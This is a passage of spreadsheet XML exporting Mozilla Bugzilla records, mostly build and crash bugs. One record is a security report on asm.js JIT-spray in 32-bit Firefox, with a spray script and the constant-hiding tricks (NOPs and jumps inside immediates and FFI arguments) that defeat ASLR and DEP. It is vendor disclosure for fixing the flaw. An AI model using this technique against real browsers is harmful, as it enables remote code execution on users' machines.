          <t>Trunk</t>
        </is>
      </c>
      <c r="L3753" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3753" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3753" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3753" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3753" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q3753" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3753" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3753" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T3753" t="n">
        <v>1</v>
      </c>
      <c r="U3753" t="n">
        <v>0</v>
      </c>
      <c r="V3753" t="n">
        <v>57</v>
      </c>
      <c r="W3753" t="inlineStr">
        <is>
          <t>Created attachment 8820887
PoC for Firefox 50.1.0 (Release). Demonstrates point 2.1 in the report
asm.js allows to JIT-spray attacker controlled code, and hence, allows to fully
bypass ASLR and DEP in 32-bit (x86) Firefox (Tested versions: Release and
Nightly). As it is very easy to find, I do not know if it is already known (I
hope I do not reinvent the wheel here...)
In summary this means, that an attacker can exploit a memory corruption
vulnerability (such as an UAF) as if no ASLR and DEP existed. He only needs EIP
control and does not need any memory disclosures/info-leaks or code-reuse. That
makes exploitation of memory corruptions for an attacker super easy.
Consider following asm.js script:
&lt;script&gt;
function asm_js_module(){
    "use asm"
    function asm_js_function(){
        /* attacker controlled asm.js code */
    }
    return asm_js_function
}
modules = []
/* create 0x1000 executable regions containing our code */
for (i=0; i&lt;0x1000; i++){
    /* request asm.js module */
    modules[i] = asm_js_module() 
}
&lt;/script&gt;
Each time an asm.js module is requested, VirtualAlloc is called and returns a
new RW (PAGE_READWRITE) region aligned to 0xXXXX0000. At that point the call
stack looks like this (Firefox 50.1.0):
0:000&gt; kP a
 # ChildEBP RetAddr  
00 008fe060 670ef66e KERNEL32!VirtualAllocStub
01 (Inline) -------- xul!js::jit::AllocateExecutableMemory+0x10 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\executableallocatorwin.cpp @ 190]
02 008fe078 670f65c7 xul!AllocateCodeSegment(
            class js::ExclusiveContext * cx = 0x04516000, 
            unsigned int totalLength = &lt;Value unavailable error&gt;)+0x23 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 67]
03 008fe0b8 670de070 xul!js::wasm::CodeSegment::create(
            struct JSContext * cx = 0x04516000, 
            class mozilla::Vector&lt;unsigned char,0,js::SystemAllocPolicy&gt; * bytecode = 0x08c61008, 
            struct js::wasm::LinkData * linkData = 0x08c61020, 
            struct js::wasm::Metadata * metadata = 0x06ab68d0, 
            class JS::Handle&lt;js::WasmMemoryObject *&gt; memory = class JS::Handle&lt;js::WasmMemoryObject *&gt;)+0x67 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 206]
04 008fe184 6705f99d xul!js::wasm::Module::instantiate(
            struct JSContext * cx = 0x04516000, 
            class JS::Handle&lt;JS::GCVector&lt;JSFunction *,0,js::TempAllocPolicy&gt; &gt; funcImports = class JS::Handle&lt;JS::GCVector&lt;JSFunction *,0,js::TempAllocPolicy&gt; &gt;, 
            class JS::Handle&lt;js::WasmTableObject *&gt; tableImport = class JS::Handle&lt;js::WasmTableObject *&gt;, 
            class JS::Handle&lt;js::WasmMemoryObject *&gt; memoryImport = class JS::Handle&lt;js::WasmMemoryObject *&gt;, 
            class mozilla::Vector&lt;js::wasm::Val,0,js::SystemAllocPolicy&gt; * globalImports = 0x008fe200, 
            class JS::Handle&lt;JSObject *&gt; instanceProto = class JS::Handle&lt;JSObject *&gt;, 
            class JS::MutableHandle&lt;js::WasmInstanceObject *&gt; instanceObj = class JS::MutableHandle&lt;js::WasmInstanceObject *&gt;)+0x94 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmmodule.cpp @ 689]
05 008fe260 6705aae6 xul!TryInstantiate(
            struct JSContext * cx = 0x04516000, 
            class JS::CallArgs args = class JS::CallArgs, 
            class js::wasm::Module * module = 0x08c61000, 
            struct js::AsmJSMetadata * metadata = 0x06ab68d0, 
            class JS::MutableHandle&lt;js::WasmInstanceObject *&gt; instanceObj = class JS::MutableHandle&lt;js::WasmInstanceObject *&gt;, 
            class JS::MutableHandle&lt;JSObject *&gt; exportObj = class JS::MutableHandle&lt;JSObject *&gt;)+0x1e6 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 7894]
06 008fe2c4 35713638 xul!InstantiateAsmJS(
            struct JSContext * cx = 0x04516000, 
            unsigned int argc = 0, 
            class JS::Value * vp = 0x008fe2f0)+0x88 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 8008]
Afterwards, the asm.js compiled/native code is copied to the RW region
(firefox-50.1.0/js/src/asmjs/WasmCode.cpp:223 in method CodeSegment::create):
223         memcpy(cs-&gt;code(), bytecode.begin(), bytecode.length());
224         StaticallyLink(*cs, linkData, cx);
225         if (memory)
226             SpecializeToMemory(*cs, metadata, memory);
227     }
228 
229     if (!ExecutableAllocator::makeExecutable(cs-&gt;code(), cs-&gt;codeLength())) {
And in line 229 the RW region is made executable (PAGE_EXECUTE_READ) with
ExecutableAllocator::makeExecutable which calls VirtualProtect.
An attacker can request one asm.js module many times, which leads to the
creation of many RX regions. Due to the allocation granularity of VirtualAlloc
he can then choose a fixed address (such as 0x1c1c0000) and can be certain that
his compiled/native asm.js code is located there.
IMO following flaws/missing checks are responsible that asm.js JIT-spray is
possible. Some of them are well known:
1) Not MANY, but only ONE RX region should be created per module. Many requests
to one asm.js module should return references instead of new RX regions.
2.1) Constant folding is missing in Release (50.1.0). (But it seems it was
added in Nightly between 18 Nov. 2016 and 30 Nov. 2016). This makes it possible
to use many subsequent arithmetic operations on one variable and wrap the
legitimate instructions.
For example, we can hide three NOPS (0x90) in asm.js constants with:
    VAL = (VAL + 0xA8909090)|0;
    VAL = (VAL + 0xA8909090)|0;
Following native code is generated:
    00: 05909090A8    ADD EAX, 0xA8909090
    05: 05909090A8    ADD EAX, 0xA8909090
When we jump into offset 01 (the immediate of the first instruction) we can
execute our hidden code (We'll use 0xA8 as masking byte):
    01: 90    NOP
    02: 90    NOP
    03: 90    NOP
    04: A805  TEST AL, 05
    06: 90    NOP
    07: 90    NOP
    08: 90    NOP
    09: A8...
2.2) Although constant folding/propagation seems to be implemented in Nightly,
an attacker can still force to emit his hidden code: for example, he can hide
two nops and a jump to the next constant with following asm.js code:
    asm_js_heap[0x10] = 0xEB069090;
    asm_js_heap[0x11] = 0xEB069090;
asm.js emits following native code:
    00: B89090EB06	MOV EAX, 0x06EB9090
    05: A340C07B04	MOV DWORD [0x047BC040], EAX
    0A: B89090EB06	MOV EAX, 0x06EB9090
    0F: A344C07B04	MOV DWORD [0x047BC044], EAX
But when we jump into offset 01, we get:
    01: 90    NOP
    02: 90    NOP
    03: EB06  JMP 0x0B
    ..
    0B: 90    NOP
    0C: 90    NOP
    0D: EB06  JMP 0x15
    ..
2.3) Another possibility is to use FFI and pass many parameters to it.
Consider following asm.js code:
    heap[10] = ffi(0x90909090|0, 0x90909090|0, 0x90909090|0, 0x90909090|0, /* and many more*/ )
Following native code is emitted (Nightly 53.0a1 20161215061212 32-bit - Windows 10):
    0:026&gt; u 1c1c0053
    1c1c0053 90              nop
    1c1c0054 90              nop
    1c1c0055 90              nop
    1c1c0056 c744240c90909090 mov     dword ptr [esp+0Ch],90909090h
    1c1c005e c744241090909090 mov     dword ptr [esp+10h],90909090h
    1c1c0066 c744241490909090 mov     dword ptr [esp+14h],90909090h
    1c1c006e c744241890909090 mov     dword ptr [esp+18h],90909090h
    1c1c0076 c744241c90909090 mov     dword ptr [esp+1Ch],90909090h
This again allows to use two bytes as payload bytes and two bytes as jump to
the next constant.
3) There is no constant blinding of 4-byte constants. Hence, an attacker can
use the well known trick to hide his opcodes/payload/shellcode within the
constants (as shown in 2.1, 2.2, 2.3).
4) There is insufficient random nop insertion. It seems that the same amount
and type of nops are emitted for a specific module. That means, that the native
code of one module is fully predictable. An attacker can test his code and use
it across other machines with the same OS/Firefox version (am I missing here
sth.?). Better random nop insertion would break 2.1, 2.2, 2.3. More random
base addresses, each time the same module is used would help, too.  Separating
code from data such as using a constant pool for constants might also help.
To demonstrate that this asm.js JIT-spray works, I attached several proof of
concepts for Windows 8.1 and Windows 10 (including an exploit for
CVE-2016-9079, the recent Tor Browser 0day). I have also exploits for
CVE-2016-1960 and CVE-2016-2819, but the attached PoCs should proof the point.
Information how to test them is available in the PoCs.
Principally, asm.js JIT-spray should work for Linux, too. However, mmap returns
regions on a 4 KB granularity, hence more modules need to be sprayed to occupy
a predictable address. I did not investigate any possibilities for 64-bit
Firefox. However it might also be affected in one or another way.
I think JIT hardening was also tracked by
https://bugzilla.mozilla.org/show_bug.cgi?id=677272.
Please correct me if anything is wrong or if I missed something. Or ping me if
one of the PoCs does not work or if you need more information.
More general information about JIT-spray can be found here:
https://packetstormsecurity.com/files/86975/Writing-JIT-Spray-Shellcode.pdf
http://zhodiac.hispahack.com/my-stuff/security/Flash_Jit_InfoLeak_Gadgets.pdf
https://www.nccgroup.trust/globalassets/resources/us/presentations/documents/attacking_clientside_jit_compilers.pdf
https://www.nccgroup.trust/globalassets/resources/us/presentations/documents/attacking_clientside_jit_compilers_paper.pdf
https://media.blackhat.com/bh-us-11/Tsai/BH_US_11_TsaiPan_Weapons_Targeted_Attack_Slides.pdf
https://erpscan.com/wp-content/uploads/2012/06/HITB-JIT-Spray-Attacks-and-Advanced-Shellcode.pdf
http://xlab.tencent.com/en/2015/12/09/bypass-dep-and-cfg-using-jit-compiler-in-chakra-engine/
https://sites.google.com/site/bingsunsec/WARPJIT/JIT%20Spraying%20Never%20Dies%20-%20Bypass%20CFG%20By%20Leveraging%20WARP%20Shader%20JIT%20Spraying.pdf
Best,
    Rh0</t>
        </is>
      </c>
      <c r="X3753" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3754">
      <c r="A3754" t="n">
        <v>1595808</v>
      </c>
      <c r="B3754" t="inlineStr">
        <is>
          <t>2019-11-12 08:03:04 -0800</t>
        </is>
      </c>
      <c r="C3754" t="inlineStr">
        <is>
          <t>taskgraph: `run-task` ignores git tag</t>
        </is>
      </c>
      <c r="D3754" t="inlineStr">
        <is>
          <t>2024-03-18 10:51:37 -0700</t>
        </is>
      </c>
      <c r="E3754" t="n">
        <v>1</v>
      </c>
      <c r="F3754" t="n">
        <v>1</v>
      </c>
      <c r="G3754" t="n">
        <v>5</v>
      </c>
      <c r="H3754" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3754" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3754" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3754" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3754" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3754" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3754" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3754" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3754" t="inlineStr"/>
      <c r="Q3754" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3754" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3754" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3754" t="n">
        <v>1</v>
      </c>
      <c r="U3754" t="n">
        <v>0</v>
      </c>
      <c r="V3754" t="n">
        <v>25</v>
      </c>
      <c r="W3754" t="inlineStr">
        <is>
          <t>Sebastian just noticed Android-Components releases are built off the master branch[1] even though the decision task specifies the following payload:
```
"env": {
    "MOBILE_HEAD_REF": "master",
    "MOBILE_HEAD_REPOSITORY": "https://github.com/mozilla-mobile/android-components",
    "MOBILE_HEAD_REV": "v21.0.0",
    "MOBILE_HEAD_TAG": "v21.0.0",
}
```
I initially thought it's a fallout of the Taskgraph migration, but the first release that has taskgraph enabled was AC 16.0.0, and it didn't have this flaw[3]. After looking more closely, the first busted AC is 18.0.0[4] because the taskgraph image was bumped in [5]. This bump introduced that patch[6], which exposes `HEAD_REF` to any `run-task` task (including AC build tasks). It turns out `run-task` prefers `HEAD_REF` whenever it's specified[7].
Tom, I'm not sure what's the right fix, here. I see several ways, but none of them seems ideal. Do you have an idea?
Impact if we don't fix it: Android-Components cannot ship any dot releases.
[1] https://firefox-ci-tc.services.mozilla.com/tasks/c4wJXJsMT_2Oj2Eg8CMVUg/runs/0/logs/https%3A%2F%2Ffirefox-ci-tc.services.mozilla.com%2Fapi%2Fqueue%2Fv1%2Ftask%2Fc4wJXJsMT_2Oj2Eg8CMVUg%2Fruns%2F0%2Fartifacts%2Fpublic%2Flogs%2Flive.log#L23
[2] https://firefox-ci-tc.services.mozilla.com/tasks/e8Sgva6iSM-8VOEnwEsc-A 
[3] https://tools.taskcluster.net/groups/ewYBlP_eQ9euNKnMmbKfIQ/tasks/LL2FrM7ESBeK2c0jpsDSoA/runs/0/logs/public%2Flogs%2Flive_backing.log#L31
[4] https://tools.taskcluster.net/groups/bA5FnaiLQjePvat8593PWw/tasks/bA5FnaiLQjePvat8593PWw/runs/0/logs/public%2Flogs%2Flive_backing.log#L18
[5] https://github.com/mozilla-mobile/android-components/pull/4745/files#diff-ac0229d1171c0983b27003af4c7441a5R10
[6] https://hg.mozilla.org/ci/taskgraph/rev/faeb33c29200827783e3244ea7c5b8bafa9b9f72
[7] https://hg.mozilla.org/ci/taskgraph/file/bbd657c72f8a5fb113f14ca0a8bd02d9cbd06189/src/taskgraph/run-task/run-task#l446</t>
        </is>
      </c>
      <c r="X3754" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3755">
      <c r="A3755" t="n">
        <v>287262</v>
      </c>
      <c r="B3755" t="inlineStr">
        <is>
          <t>2005-03-22 12:14:10 -0800</t>
        </is>
      </c>
      <c r="C3755" t="inlineStr">
        <is>
          <t>build packages for locales by starting with en-US complete packages</t>
        </is>
      </c>
      <c r="D3755" t="inlineStr">
        <is>
          <t>2018-11-26 09:45:22 -0800</t>
        </is>
      </c>
      <c r="E3755" t="n">
        <v>1</v>
      </c>
      <c r="F3755" t="n">
        <v>1</v>
      </c>
      <c r="G3755" t="n">
        <v>7</v>
      </c>
      <c r="H3755" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3755" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3755" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3755" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3755" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3755" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3755" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3755" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3755" t="inlineStr">
        <is>
          <t>still needs tinderbox work from Chase, see attachment 182704</t>
        </is>
      </c>
      <c r="Q3755" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3755" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3755" t="inlineStr">
        <is>
          <t>Firefox1.5</t>
        </is>
      </c>
      <c r="T3755" t="n">
        <v>1</v>
      </c>
      <c r="U3755" t="n">
        <v>0</v>
      </c>
      <c r="V3755" t="n">
        <v>54</v>
      </c>
      <c r="W3755" t="inlineStr">
        <is>
          <t>The current build process for creating a copy of Firefox in any locale requires
building the source from scratch (or reusing a set of built files) and then
packaging those files with the locale files.  We should add a new process to our
build system that allows the build to start with a set of en-US package files
(maybe just the .zip or maybe the .zip and the .exe), unpackages them, then
repackages the files for a new locale.
I see the human process for managing the builds occurring something like this:
  * While the trunk/branch is in open development, the l10n build systems build
    as they do today by checking out the CVS code.
  * When we get code complete in en-US, we take the generated files from the
    en-US build systems and place them in a special location on the l10n build
    systems that the build process recognizes as holding finished products.
  * Upon seeing these files, the build process knows to skip checking out most
    of the source code (for example, maybe it only checks out the locale files)
    and instead unpackages the files.
  * The build process then picks up at the point where the locale files are
    packaged with the product files (from the en-US build), completes the
    build, and moves on to the next locale.
  * The resulting files that are uploaded are sent to the FTP site and are
    essentially the same product files as the en-US files, hence having the
    same Talkback ID and symbols as en-US users.</t>
        </is>
      </c>
      <c r="X3755" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3756">
      <c r="A3756" t="n">
        <v>1245795</v>
      </c>
      <c r="B3756" t="inlineStr">
        <is>
          <t>2016-02-04 02:56:18 -0800</t>
        </is>
      </c>
      <c r="C3756" t="inlineStr">
        <is>
          <t>API Key (glocation) in broadcast protected with signature-level permission can be accessed by an application installed beforehand that defines the same permissions</t>
        </is>
      </c>
      <c r="D3756" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:06 -0700</t>
        </is>
      </c>
      <c r="E3756" t="n">
        <v>1</v>
      </c>
      <c r="F3756" t="n">
        <v>1</v>
      </c>
      <c r="G3756" t="n">
        <v>6</v>
      </c>
      <c r="H3756" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3756" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3756" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3756" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L3756" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3756" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3756" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3756" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3756" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+]</t>
        </is>
      </c>
      <c r="Q3756" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3756" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3756" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T3756" t="n">
        <v>1</v>
      </c>
      <c r="U3756" t="n">
        <v>0</v>
      </c>
      <c r="V3756" t="n">
        <v>23</v>
      </c>
      <c r="W3756" t="inlineStr">
        <is>
          <t>Created attachment 8715751
poc-apikey.apk
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Steps to reproduce:
1. Launch an emulator (or device) whose API level is 19( or lower)
2. Install attached poc app (poc-apikey.apk) with adb
3. Install firefox for android (fennec) with adb
4. Launch and use firefox app
Actual results:
The poc app can receive a broadcast protedted with "org.mozilla.fennec.permission.PER_ANDROID_PACKAGE".
So, the poc app can read API Key in the broadcast.
Expected results:
The broadcast cannot be read from app whose signature is different from Mozilla's one.
Or the broadcast will change so that it does not have api key.</t>
        </is>
      </c>
      <c r="X3756" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3757">
      <c r="A3757" t="n">
        <v>387961</v>
      </c>
      <c r="B3757" t="inlineStr">
        <is>
          <t>2007-07-12 16:59:16 -0700</t>
        </is>
      </c>
      <c r="C3757" t="inlineStr">
        <is>
          <t>Need win32 buildslave for Buildbot patch uploader</t>
        </is>
      </c>
      <c r="D3757" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3757" t="n">
        <v>1</v>
      </c>
      <c r="F3757" t="n">
        <v>1</v>
      </c>
      <c r="G3757" t="n">
        <v>5</v>
      </c>
      <c r="H3757" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3757" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3757" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3757" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3757" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3757" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3757" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3757" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3757" t="inlineStr">
        <is>
          <t>complete</t>
        </is>
      </c>
      <c r="Q3757" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3757" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3757" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3757" t="n">
        <v>1</v>
      </c>
      <c r="U3757" t="n">
        <v>0</v>
      </c>
      <c r="V3757" t="n">
        <v>5</v>
      </c>
      <c r="W3757" t="inlineStr">
        <is>
          <t>We need a Windows VM to act as a buildslave for the Buildbot patch uploader.</t>
        </is>
      </c>
      <c r="X3757" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3758">
      <c r="A3758" t="n">
        <v>317265</v>
      </c>
      <c r="B3758" t="inlineStr">
        <is>
          <t>2005-11-21 01:53:17 -0800</t>
        </is>
      </c>
      <c r="C3758" t="inlineStr">
        <is>
          <t>[FIX]Crash when following the steps in this evil testcase, using float:right [@ nsINodeInfo::GetDocument]</t>
        </is>
      </c>
      <c r="D3758" t="inlineStr">
        <is>
          <t>2006-08-15 17:21:18 -0700</t>
        </is>
      </c>
      <c r="E3758" t="n">
        <v>1</v>
      </c>
      <c r="F3758" t="n">
        <v>1</v>
      </c>
      <c r="G3758" t="n">
        <v>3</v>
      </c>
      <c r="H3758" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3758" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3758" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K3758" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3758" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3758" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3758" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3758" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3758" t="inlineStr"/>
      <c r="Q3758" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3758" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3758" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T3758" t="n">
        <v>1</v>
      </c>
      <c r="U3758" t="n">
        <v>0</v>
      </c>
      <c r="V3758" t="n">
        <v>16</v>
      </c>
      <c r="W3758" t="inlineStr">
        <is>
          <t>See upcoming testcase (which is strange html, but that's the only way it seems to crash)
First click on the button, then hover over the red bordered box to get the crash.
If it doesn't crash the first time, reload the document and try it again, it should crash within 3 times normally (it does for me).
It seems a regression, it doesn't crash with a 2005-04-18 build, but crashes with a 2005-04-19 build:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-04-18+08%3A00%3A00&amp;maxdate=2005-04-19+07%3A00%3A00&amp;cvsroot=%2Fcvsroot
I got this backtrace from a debug build:
Program received signal SIGSEGV, Segmentation fault.
0x0599837d in nsINodeInfo::GetDocument() const (this=0xfeeefeee)
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    at ../../../dist/include/content/nsINodeInfo.h:269
269         return mOwnerManager-&gt;GetDocument();
Current language:  auto; currently c++
(gdb) bt
#0  0x0599837d in nsINodeInfo::GetDocument() const (this=0xfeeefeee)
    at ../../../dist/include/content/nsINodeInfo.h:269
#1  0x05997a40 in nsIContent::GetOwnerDoc() const (this=&lt;incomplete type&gt;)
    at ../../../dist/include/content/nsIContent.h:171
#2  0x0578436a in nsXBLBinding::AllowScripts() (this=0xfa88a50)
    at c:/mozilla/mozilla/content/xbl/src/nsXBLBinding.cpp:1211
#3  0x05783105 in nsXBLBinding::ExecuteAttachedHandler() (this=0xfa88a50)
    at c:/mozilla/mozilla/content/xbl/src/nsXBLBinding.cpp:788
#4  0x057830fa in nsXBLBinding::ExecuteAttachedHandler() (this=0xfa88a88)
    at c:/mozilla/mozilla/content/xbl/src/nsXBLBinding.cpp:786
#5  0x057a2666 in nsBindingManager::ProcessAttachedQueue() (this=0xf803a88)
    at c:/mozilla/mozilla/content/xbl/src/nsBindingManager.cpp:789
#6  0x05395415 in nsCSSFrameConstructor::ContentInserted(nsIContent*, nsIContent
*, int, nsILayoutHistoryState*, int) (this=0xfa66300, aContainer=0xf816238,
    aChild=0xfa8e3a8, aIndexInContainer=1, aFrameState=0xfa62290,
    aInReinsertContent=0)
    at c:/mozilla/mozilla/layout/base/nsCSSFrameConstructor.cpp:9457
#7  0x05399e89 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*)
    (this=0xfa66300, aContent=0xfa8e3a8)
    at c:/mozilla/mozilla/layout/base/nsCSSFrameConstructor.cpp:11497
#8  0x05397240 in nsCSSFrameConstructor::RestyleElement(nsIContent*, nsIFrame*,
nsChangeHint) (this=0xfa66300, aContent=0xfa8e3a8, aPrimaryFrame=0xfa8cafc,
    aMinHint=0)
    at c:/mozilla/mozilla/layout/base/nsCSSFrameConstructor.cpp:10376
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
#9  0x0539d6ff in nsCSSFrameConstructor::ProcessOneRestyle(nsIContent*, nsReStyl
eHint, nsChangeHint) (this=0xfa66300, aContent=0xfa8e3a8,
    aRestyleHint=eReStyle_Self, aChangeHint=0)
    at c:/mozilla/mozilla/layout/base/nsCSSFrameConstructor.cpp:13210
#10 0x0539d980 in nsCSSFrameConstructor::ProcessPendingRestyles() (
    this=0xfa66300)
    at c:/mozilla/mozilla/layout/base/nsCSSFrameConstructor.cpp:13257
#11 0x0539dc45 in nsCSSFrameConstructor::RestyleEvent::HandleEvent() (
    this=0xfa4dfd8)
    at c:/mozilla/mozilla/layout/base/nsCSSFrameConstructor.cpp:13323
#12 0x0539dc81 in HandleRestyleEvent(PLEvent*) (aEvent=0xfa4dfd8)
    at c:/mozilla/mozilla/layout/base/nsCSSFrameConstructor.cpp:13332
#13 0x009e3826 in PL_HandleEvent (self=0xfa4dfd8)
    at c:/mozilla/mozilla/xpcom/threads/plevent.c:688
#14 0x009e36b7 in PL_ProcessPendingEvents (self=0x2242378)
    at c:/mozilla/mozilla/xpcom/threads/plevent.c:623
#15 0x009e6eab in nsEventQueueImpl::ProcessPendingEvents() (this=0x224aeb8)
    at c:/mozilla/mozilla/xpcom/threads/nsEventQueue.cpp:417
#16 0x6304ca12 in nsWindow::DispatchPendingEvents() (this=0xfa90340)
    at c:/mozilla/mozilla/widget/src/windows/nsWindow.cpp:4118
#17 0x6304dd8b in nsWindow::ProcessMessage(unsigned, unsigned, long, long*) (
    this=0xfa90340, msg=512, wParam=0, lParam=3998701, aRetValue=0x22fac0)
    at c:/mozilla/mozilla/widget/src/windows/nsWindow.cpp:4498
#18 0x630452d9 in nsWindow::WindowProc(HWND__*, unsigned, unsigned, long) (
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---\
    hWnd=0x1f03a8, msg=512, wParam=0, lParam=3998701)
    at c:/mozilla/mozilla/widget/src/windows/nsWindow.cpp:1347
#19 0x77d37b17 in USER32!SetWindowPlacement ()
   from /cygdrive/c/WINDOWS/system32/user32.dll
#20 0x001f03a8 in ?? ()
#21 0x00000200 in ?? ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0599837d in nsINodeInfo::GetDocument() const (this=0xfeeefeee)
    at ../../../dist/include/content/nsINodeInfo.h:269
269         return mOwnerManager-&gt;GetDocument();
(gdb) cont
Continuing.
Program exited with code 0200.
(gdb)</t>
        </is>
      </c>
      <c r="X3758" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3759">
      <c r="A3759" t="n">
        <v>389677</v>
      </c>
      <c r="B3759" t="inlineStr">
        <is>
          <t>2007-07-26 08:07:59 -0700</t>
        </is>
      </c>
      <c r="C3759" t="inlineStr">
        <is>
          <t>[FIX]flash video that uses &lt;object&gt; and incorrect content-type no longer works</t>
        </is>
      </c>
      <c r="D3759" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3759" t="n">
        <v>1</v>
      </c>
      <c r="F3759" t="n">
        <v>1</v>
      </c>
      <c r="G3759" t="n">
        <v>6</v>
      </c>
      <c r="H3759" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
